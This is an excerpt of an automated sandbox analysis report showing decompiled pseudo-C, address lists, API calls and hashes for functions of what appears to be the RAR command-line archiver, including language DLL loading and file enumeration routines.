                                                                                                            0x7ff650b26680
                                                                                                            0x7ff650b26692
                                                                                                            0x7ff650b2669c
                                                                                                            0x7ff650b266a6
                                                                                                            0x7ff650b266a8
                                                                                                            0x7ff650b266b3
                                                                                                            0x7ff650b266bc
                                                                                                            0x7ff650b266c1
                                                                                                            0x7ff650b266c4
                                                                                                            0x7ff650b266c9
                                                                                                            0x7ff650b266cf
                                                                                                            0x7ff650b266d3
                                                                                                            0x7ff650b266d8
                                                                                                            0x7ff650b266e3
                                                                                                            0x7ff650b266e8
                                                                                                            0x7ff650b266ed
                                                                                                            0x7ff650b266f7
                                                                                                            0x7ff650b2670a
                                                                                                            0x7ff650b2670f
                                                                                                            0x7ff650b26719
                                                                                                            0x7ff650b26721
                                                                                                            0x7ff650b2672a
                                                                                                            0x7ff650b26733
                                                                                                            0x7ff650b26741
                                                                                                            0x7ff650b26747
                                                                                                            0x7ff650b26747
                                                                                                            0x7ff650b2674c
                                                                                                            0x7ff650b2675b
                                                                                                            0x7ff650b26764
                                                                                                            0x7ff650b2676b
                                                                                                            0x7ff650b26770
                                                                                                            0x7ff650b2677f
                                                                                                            0x7ff650b26785
                                                                                                            0x7ff650b2679a
                                                                                                            0x7ff650b267b0
                                                                                                            0x7ff650b267b4
                                                                                                            0x7ff650b267bc
                                                                                                            0x7ff650b267ce
                                                                                                            0x7ff650b267d0
                                                                                                            0x7ff650b267d8
                                                                                                            0x7ff650b267e2
                                                                                                            0x7ff650b267e5
                                                                                                            0x7ff650b267ea
                                                                                                            0x7ff650b267f5
                                                                                                            0x7ff650b267fe
                                                                                                            0x7ff650b26803
                                                                                                            0x7ff650b26808
                                                                                                            0x7ff650b2680d
                                                                                                            0x7ff650b26816
                                                                                                            0x7ff650b2681b
                                                                                                            0x7ff650b26820
                                                                                                            0x7ff650b26824
                                                                                                            0x7ff650b2682d
                                                                                                            0x7ff650b26833
                                                                                                            0x7ff650b26839
                                                                                                            0x7ff650b2683f
                                                                                                            0x7ff650b26848
                                                                                                            0x7ff650b2684a
                                                                                                            0x7ff650b26851
                                                                                                            0x7ff650b2685a
                                                                                                            0x7ff650b26863
                                                                                                            0x7ff650b2686c
                                                                                                            0x7ff650b26875
                                                                                                            0x7ff650b2687e
                                                                                                            0x7ff650b26880
                                                                                                            0x7ff650b26886
                                                                                                            0x7ff650b26888
                                                                                                            0x7ff650b2688e
                                                                                                            0x7ff650b26890
                                                                                                            0x7ff650b26896
                                                                                                            0x7ff650b26898
                                                                                                            0x7ff650b2689e
                                                                                                            0x7ff650b268a0
                                                                                                            0x7ff650b268a9
                                                                                                            0x7ff650b268ae
                                                                                                            0x7ff650b268b6
                                                                                                            0x7ff650b268c9
                                                                                                            0x7ff650b268cb
                                                                                                            0x7ff650b268d2
                                                                                                            0x7ff650b268de
                                                                                                            0x7ff650b268e3
                                                                                                            0x7ff650b268e5
                                                                                                            0x7ff650b268ec
                                                                                                            0x7ff650b268ee
                                                                                                            0x7ff650b268f5
                                                                                                            0x7ff650b268fc
                                                                                                            0x7ff650b26904
                                                                                                            0x7ff650b26911
                                                                                                            0x7ff650b26917
                                                                                                            0x7ff650b2691e
                                                                                                            0x7ff650b26925
                                                                                                            0x7ff650b26929
                                                                                                            0x7ff650b2695a

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: *.%ls$*?.$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
                                                                                                            • API String ID: 0-3209269024
                                                                                                            • Opcode ID: 2db04072c5bf18b9f0a541deef0ce86123a219f9919b5d83c8f7abb47b6f5829
                                                                                                            • Instruction ID: e810966cf2a4cb7c61929bffb6389c16be1d80478260a946e1777528012bb504
                                                                                                            • Opcode Fuzzy Hash: 2db04072c5bf18b9f0a541deef0ce86123a219f9919b5d83c8f7abb47b6f5829
                                                                                                            • Instruction Fuzzy Hash: AED2CF62D0C183A1E7259F2889C52BD2691AF47784F9C4135CA4FEB3C5EE7EFA818351
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B54470 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 78%
                                                                                                            			E00007FF67FF650B54470(void* __edx, void* __rax, void* __rbx, char* __rcx, long long __rdx, long long __rsi, void* __r8) {
				void* __rdi;
				void* __rbp;
				struct HINSTANCE__* _t29;
				void* _t37;
				signed long long _t43;
				signed long long _t44;
				signed long long _t45;
				WCHAR* _t62;
				long long _t66;
				long _t68;
				void* _t69;
				void* _t71;
				signed long long _t72;
				void* _t75;
				void* _t76;
				struct HINSTANCE__* _t77;
				char* _t78;

				_t74 = __r8;
				 *((long long*)(_t71 + 0x10)) = __rsi;
				_t69 = _t71 - 0x1050;
				E00007FF67FF650B69CB0(0x1150, __rax, _t75, _t76);
				_t72 = _t71 - __rax;
				_t43 =  *0x50b978f0; // 0x27db226282f1
				_t44 = _t43 ^ _t72;
				 *(_t69 + 0x1040) = _t44;
				_t66 = __rdx;
				_t78 = __rcx;
				E00007FF67FF650B54684(__rcx);
				if (__r8 == 0) goto 0x50b544c6;
				r8d = 0x800;
				E00007FF67FF650B5A390(_t69 + 0x40, __r8, __r8);
				goto 0x50b544d8;
				r8d = 0x800;
				GetModuleFileNameW(_t77, _t62, _t68);
				r8d = 0x800;
				E00007FF67FF650B45224(__edx, __r8, _t44, __rbx, _t69 + 0x40, L"rarlng.dll", __r8, __rdx, _t69, __r8);
				r8d = 0x800;
				E00007FF67FF650B54318(0, _t44, _t69 + 0x40, _t69 + 0x40, _t74); // executed
				 *((intOrPtr*)(_t72 + 0x20)) = 0x11c;
				GetVersionExW(??);
				r8d = 2;
				if ( *((intOrPtr*)(_t72 + 0x30)) != r8d) goto 0x50b5453f;
				_t37 =  *((intOrPtr*)(_t72 + 0x24)) - 5;
				if (_t37 > 0) goto 0x50b54531;
				if (_t37 != 0) goto 0x50b5453f;
				if ( *((intOrPtr*)(_t69 + 0x34)) - r8w < 0) goto 0x50b5453f;
				LoadLibraryW(??); // executed
				goto 0x50b54549;
				_t29 = LoadLibraryW(??);
				 *0x50ba79a0 = _t44;
				 *_t78 = 0 | _t44 != 0x00000000;
				_t45 =  *0x50ba79a0; // 0x7ff650b10000
				_t46 =  ==  ? _t66 : _t45;
				 *0x50ba79a8 = _t66;
				 *0x50ba79a0 =  ==  ? _t66 : _t45;
				return E00007FF67FF650B69D10(_t29, _t44 != 0,  *(_t69 + 0x1040) ^ _t72);
			}




















                                                                                                            0x7ff650b54470
                                                                                                            0x7ff650b54470
                                                                                                            0x7ff650b54479
                                                                                                            0x7ff650b54486
                                                                                                            0x7ff650b5448b
                                                                                                            0x7ff650b5448e
                                                                                                            0x7ff650b54495
                                                                                                            0x7ff650b54498
                                                                                                            0x7ff650b544a2
                                                                                                            0x7ff650b544a5
                                                                                                            0x7ff650b544a8
                                                                                                            0x7ff650b544b0
                                                                                                            0x7ff650b544b2
                                                                                                            0x7ff650b544bf
                                                                                                            0x7ff650b544c4
                                                                                                            0x7ff650b544c6
                                                                                                            0x7ff650b544d2
                                                                                                            0x7ff650b544d8
                                                                                                            0x7ff650b544e9
                                                                                                            0x7ff650b544ee
                                                                                                            0x7ff650b544fc
                                                                                                            0x7ff650b54506
                                                                                                            0x7ff650b5450e
                                                                                                            0x7ff650b54514
                                                                                                            0x7ff650b5451f
                                                                                                            0x7ff650b54521
                                                                                                            0x7ff650b54526
                                                                                                            0x7ff650b54528
                                                                                                            0x7ff650b5452f
                                                                                                            0x7ff650b54537
                                                                                                            0x7ff650b5453d
                                                                                                            0x7ff650b54543
                                                                                                            0x7ff650b5454c
                                                                                                            0x7ff650b54556
                                                                                                            0x7ff650b5455b
                                                                                                            0x7ff650b54562
                                                                                                            0x7ff650b54566
                                                                                                            0x7ff650b5456d
                                                                                                            0x7ff650b54596

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Library$Load$FileFreeModuleNameVersion
                                                                                                            • String ID: rarlng.dll
                                                                                                            • API String ID: 2520153904-1675521814
                                                                                                            • Opcode ID: 0407903ab710f39ff8bd1ba619182bdfba368899fc7d12e0b5e0cec27a7ecdd4
                                                                                                            • Instruction ID: 45f641d0c839ae1867b7c78ac59657b4fb50c644ecadbef89943fa2df8c6a741
                                                                                                            • Opcode Fuzzy Hash: 0407903ab710f39ff8bd1ba619182bdfba368899fc7d12e0b5e0cec27a7ecdd4
                                                                                                            • Instruction Fuzzy Hash: 48319431619A43AAFB649F20E8842E93364FF46788F584075E94EA3B98EF3ED545C701
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B34AC0 Relevance: 7.6, APIs: 5, Instructions: 97fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 54%
                                                                                                            			E00007FF67FF650B34AC0(void* __rax, void* __rcx, void* __rdx, signed long long __r8) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				long _t39;
				long _t43;
				void* _t51;
				void* _t55;
				signed long long _t66;
				signed long long _t67;
				signed long long _t81;
				signed long long _t98;
				void* _t99;
				void* _t101;
				signed long long _t102;
				void* _t107;
				void* _t108;
				void* _t109;

				_t100 = _t101 - 0x1180;
				E00007FF67FF650B69CB0(0x1280, __rax, _t107, _t108);
				_t102 = _t101 - __rax;
				_t66 =  *0x50b978f0; // 0x27db226282f1
				_t67 = _t66 ^ _t102;
				 *(_t101 - 0x1180 + 0x1170) = _t67;
				_t99 = __rdx;
				_t98 = __r8;
				r15d = 0x800;
				if (__rcx != 0xffffffff) goto 0x50b34b71;
				FindFirstFileW(??, ??); // executed
				if (_t67 != 0xffffffff) goto 0x50b34b8d;
				r8d = r15d;
				if (E00007FF67FF650B44664(_t67, _t67, __rdx, _t101 - 0x1180 + 0x170, __r8) == 0) goto 0x50b34b4a;
				FindFirstFileW(??, ??); // executed
				if (_t67 != 0xffffffff) goto 0x50b34b8d;
				_t39 = GetLastError();
				_t7 = _t67 - 2; // -2
				if ((_t7 & 0xffffffee) != 0) goto 0x50b34b64;
				if (_t39 == 0x13) goto 0x50b34b64;
				goto 0x50b34b66;
				 *((char*)(_t98 + 0x1044)) = 1;
				goto 0x50b34c22;
				if (FindNextFileW(??, ??) != 0) goto 0x50b34b8d;
				_t43 = GetLastError();
				goto 0x50b34b66;
				E00007FF67FF650B5A390(_t98, _t99, _t109);
				_t81 = _t98;
				E00007FF67FF650B45224(_t55, _t43 - 0x12, _t67, _t67 | 0xffffffff, _t81, _t102 + 0x4c, _t98, _t99, _t100, _t109);
				 *((intOrPtr*)(_t98 + 0x1008)) =  *((intOrPtr*)(_t102 + 0x20));
				 *((long long*)(_t98 + 0x1028)) =  *((intOrPtr*)(_t102 + 0x24));
				 *((long long*)(_t98 + 0x1030)) =  *((intOrPtr*)(_t102 + 0x2c));
				 *((long long*)(_t98 + 0x1000)) = (_t81 << 0x20) + _t67;
				_t25 = _t98 + 0x1010; // 0x1810
				 *((long long*)(_t98 + 0x1038)) =  *((intOrPtr*)(_t102 + 0x34));
				E00007FF67FF650B5BCC0(_t25, _t102 + 0x34);
				_t27 = _t98 + 0x1018; // 0x1818
				E00007FF67FF650B5BCC0(_t27, _t102 + 0x24);
				_t29 = _t98 + 0x1020; // 0x1820
				_t51 = E00007FF67FF650B5BCC0(_t29, _t102 + 0x2c);
				 *(_t98 + 0x1040) =  *(_t98 + 0x1040) & 0x00000000;
				return E00007FF67FF650B69D10(_t51,  *((intOrPtr*)(_t102 + 0x3c)),  *(_t100 + 0x1170) ^ _t102);
			}





















                                                                                                            0x7ff650b34ac7
                                                                                                            0x7ff650b34ad4
                                                                                                            0x7ff650b34ad9
                                                                                                            0x7ff650b34adc
                                                                                                            0x7ff650b34ae3
                                                                                                            0x7ff650b34ae6
                                                                                                            0x7ff650b34aed
                                                                                                            0x7ff650b34af5
                                                                                                            0x7ff650b34afb
                                                                                                            0x7ff650b34b05
                                                                                                            0x7ff650b34b0a
                                                                                                            0x7ff650b34b17
                                                                                                            0x7ff650b34b19
                                                                                                            0x7ff650b34b2d
                                                                                                            0x7ff650b34b3b
                                                                                                            0x7ff650b34b48
                                                                                                            0x7ff650b34b4a
                                                                                                            0x7ff650b34b50
                                                                                                            0x7ff650b34b59
                                                                                                            0x7ff650b34b5e
                                                                                                            0x7ff650b34b62
                                                                                                            0x7ff650b34b66
                                                                                                            0x7ff650b34b6c
                                                                                                            0x7ff650b34b79
                                                                                                            0x7ff650b34b7f
                                                                                                            0x7ff650b34b8b
                                                                                                            0x7ff650b34b96
                                                                                                            0x7ff650b34ba3
                                                                                                            0x7ff650b34ba6
                                                                                                            0x7ff650b34bc3
                                                                                                            0x7ff650b34bce
                                                                                                            0x7ff650b34bda
                                                                                                            0x7ff650b34be6
                                                                                                            0x7ff650b34bed
                                                                                                            0x7ff650b34bf4
                                                                                                            0x7ff650b34bfb
                                                                                                            0x7ff650b34c00
                                                                                                            0x7ff650b34c0c
                                                                                                            0x7ff650b34c11
                                                                                                            0x7ff650b34c1d
                                                                                                            0x7ff650b34c22
                                                                                                            0x7ff650b34c48

                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNELBASE(00000000,?,00000000,?,00000000,00007FF650B34A18,?,?,?,00007FF650B442F8), ref: 00007FF650B34B0A
                                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,00007FF650B442F8), ref: 00007FF650B34B3B
                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF650B442F8), ref: 00007FF650B34B4A
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,00000000,?,00000000,00007FF650B34A18,?,?,?,00007FF650B442F8), ref: 00007FF650B34B71
                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF650B442F8), ref: 00007FF650B34B7F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$ErrorFirstLast$Next
                                                                                                            • String ID:
                                                                                                            • API String ID: 869497890-0
                                                                                                            • Opcode ID: 334402598458b3e047d401b71e0832e91ac4fe90dd8b2706fb70ff8c0cc0d942
                                                                                                            • Instruction ID: 5e5f1d54a5a75fcfe885dedf2dab2ed8764c9a63bb338e035f7a63a6ae136062
                                                                                                            • Opcode Fuzzy Hash: 334402598458b3e047d401b71e0832e91ac4fe90dd8b2706fb70ff8c0cc0d942
                                                                                                            • Instruction Fuzzy Hash: 7A41A032608A86A6DA649B25D4802E873A0FF4ABF4F140331EE7E977D5EF2DE1548700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B28F58 Relevance: 4.5, APIs: 3, Instructions: 34encryptionCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 1815803762-0
                                                                                                            • Opcode ID: e314a062364e16fa841188dbfff537dd5af1f37df2a6284130e37f103fb480d3
                                                                                                            • Instruction ID: 1eb497964b37dc12d60980ef3817e9714cacdc39eefe7e43a07d4501ba63569d
                                                                                                            • Opcode Fuzzy Hash: e314a062364e16fa841188dbfff537dd5af1f37df2a6284130e37f103fb480d3
                                                                                                            • Instruction Fuzzy Hash: 53F06225B1464682E7408B16E984329A761FBD5FC0F188431DE0E97B68CE7DD942C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B2C9EC Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFormatLastMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 3479602957-0
                                                                                                            • Opcode ID: 12c8577c11c5ba2cc4e106519874f37d2ce8d2f9174c8b362752170c05448758
                                                                                                            • Instruction ID: d534d2fd504868dae2b7011d8e53a985b2d560a32788c5bc41c8300ba0e6d4ff
                                                                                                            • Opcode Fuzzy Hash: 12c8577c11c5ba2cc4e106519874f37d2ce8d2f9174c8b362752170c05448758
                                                                                                            • Instruction Fuzzy Hash: B6E06562B1874393E7508F22B48472AA795AF5ABC4F1C8134DA4A97BA9DF3DC4518704
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B6A6D0 Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 73%
                                                                                                            			E00007FF67FF650B6A6D0(void* __edx, void* __edi, void* __esp, void* __eflags, intOrPtr* __rax, long long __rbx, long long __rsi, void* __rbp, void* __r8, long long _a8, long long _a16) {
				char _v24;
				void* __rdi;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t25;
				void* _t29;
				intOrPtr _t38;
				intOrPtr* _t61;
				intOrPtr* _t62;
				void* _t76;
				void* _t81;
				void* _t87;

				_t87 = __r8;
				_t81 = __rbp;
				_t79 = __rsi;
				_t63 = __rbx;
				_t61 = __rax;
				E00007FF67FF650B6ACA8(); // executed
				SetUnhandledExceptionFilter(??);
				goto 0x50b7476c;
				asm("int3");
				asm("int3");
				asm("int3");
				_a8 = __rbx;
				_a16 = __rsi;
				_t10 = E00007FF67FF650B6A17C(1); // executed
				if (_t10 == 0) goto 0x50b6a843;
				sil = 0;
				_v24 = sil;
				_t11 = E00007FF67FF650B6A140();
				_t38 =  *0x50bb3800; // 0x2
				if (_t38 == 1) goto 0x50b6a84e;
				if (_t38 != 0) goto 0x50b6a779;
				 *0x50bb3800 = 1;
				_t12 = E00007FF67FF650B74608(__rbx, 0x50b805d0, 0x50b80610, __rsi, _t76); // executed
				if (_t12 == 0) goto 0x50b6a75a;
				goto 0x50b6a833;
				E00007FF67FF650B74590(_t63, 0x50b80570, 0x50b805c8, _t76, _t79); // executed
				 *0x50bb3800 = 2;
				goto 0x50b6a781;
				sil = 1;
				_v24 = sil;
				E00007FF67FF650B6AE10(E00007FF67FF650B6A2EC(_t11, 0x50b805c8));
				if ( *_t61 == 0) goto 0x50b6a7b4;
				if (E00007FF67FF650B6A254(_t61, _t61) == 0) goto 0x50b6a7b4;
				r8d = 0;
				_t5 = _t87 + 2; // 0x2
				_t62 =  *_t61;
				E00007FF67FF650B6AE18( *0x50b80550());
				if ( *_t62 == 0) goto 0x50b6a7d6;
				if (E00007FF67FF650B6A254(_t62, _t62) == 0) goto 0x50b6a7d6;
				_t72 =  *_t62;
				E00007FF67FF650B727C4(_t62,  *_t62);
				E00007FF67FF650B74688(E00007FF67FF650B74690(E00007FF67FF650B73E9C()));
				_t88 = _t62;
				_t75 =  *_t62;
				_t25 = E00007FF67FF650B48044( *_t62, _t5, __edi, __esp, E00007FF67FF650B6A254(_t62, _t62), _t62,  *_t62,  *_t62,  *_t62, _t79, _t81, _t62); // executed
				if (E00007FF67FF650B6AC54(_t62) == 0) goto 0x50b6a858;
				if (sil != 0) goto 0x50b6a80d;
				E00007FF67FF650B727A8(_t62,  *_t62,  *_t62, _t62);
				E00007FF67FF650B6A310(1, 0);
				_t29 = _t25;
				if (E00007FF67FF650B6AC54(_t62) == 0) goto 0x50b6a860;
				if (_v24 != 0) goto 0x50b6a831;
				E00007FF67FF650B72798(_t62, _t72, _t75, _t88);
				return _t29;
			}
















                                                                                                            0x7ff650b6a6d0
                                                                                                            0x7ff650b6a6d0
                                                                                                            0x7ff650b6a6d0
                                                                                                            0x7ff650b6a6d0
                                                                                                            0x7ff650b6a6d0
                                                                                                            0x7ff650b6a6d4
                                                                                                            0x7ff650b6a6d9
                                                                                                            0x7ff650b6a6e4
                                                                                                            0x7ff650b6a6e9
                                                                                                            0x7ff650b6a6ea
                                                                                                            0x7ff650b6a6eb
                                                                                                            0x7ff650b6a6ec
                                                                                                            0x7ff650b6a6f1
                                                                                                            0x7ff650b6a700
                                                                                                            0x7ff650b6a707
                                                                                                            0x7ff650b6a70d
                                                                                                            0x7ff650b6a710
                                                                                                            0x7ff650b6a715
                                                                                                            0x7ff650b6a71c
                                                                                                            0x7ff650b6a725
                                                                                                            0x7ff650b6a72d
                                                                                                            0x7ff650b6a72f
                                                                                                            0x7ff650b6a747
                                                                                                            0x7ff650b6a74e
                                                                                                            0x7ff650b6a755
                                                                                                            0x7ff650b6a768
                                                                                                            0x7ff650b6a76d
                                                                                                            0x7ff650b6a777
                                                                                                            0x7ff650b6a779
                                                                                                            0x7ff650b6a77c
                                                                                                            0x7ff650b6a788
                                                                                                            0x7ff650b6a794
                                                                                                            0x7ff650b6a7a0
                                                                                                            0x7ff650b6a7a2
                                                                                                            0x7ff650b6a7a5
                                                                                                            0x7ff650b6a7ab
                                                                                                            0x7ff650b6a7b4
                                                                                                            0x7ff650b6a7c0
                                                                                                            0x7ff650b6a7cc
                                                                                                            0x7ff650b6a7ce
                                                                                                            0x7ff650b6a7d1
                                                                                                            0x7ff650b6a7e6
                                                                                                            0x7ff650b6a7eb
                                                                                                            0x7ff650b6a7ee
                                                                                                            0x7ff650b6a7f3
                                                                                                            0x7ff650b6a801
                                                                                                            0x7ff650b6a806
                                                                                                            0x7ff650b6a808
                                                                                                            0x7ff650b6a811
                                                                                                            0x7ff650b6a816
                                                                                                            0x7ff650b6a823
                                                                                                            0x7ff650b6a82a
                                                                                                            0x7ff650b6a82c
                                                                                                            0x7ff650b6a842

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
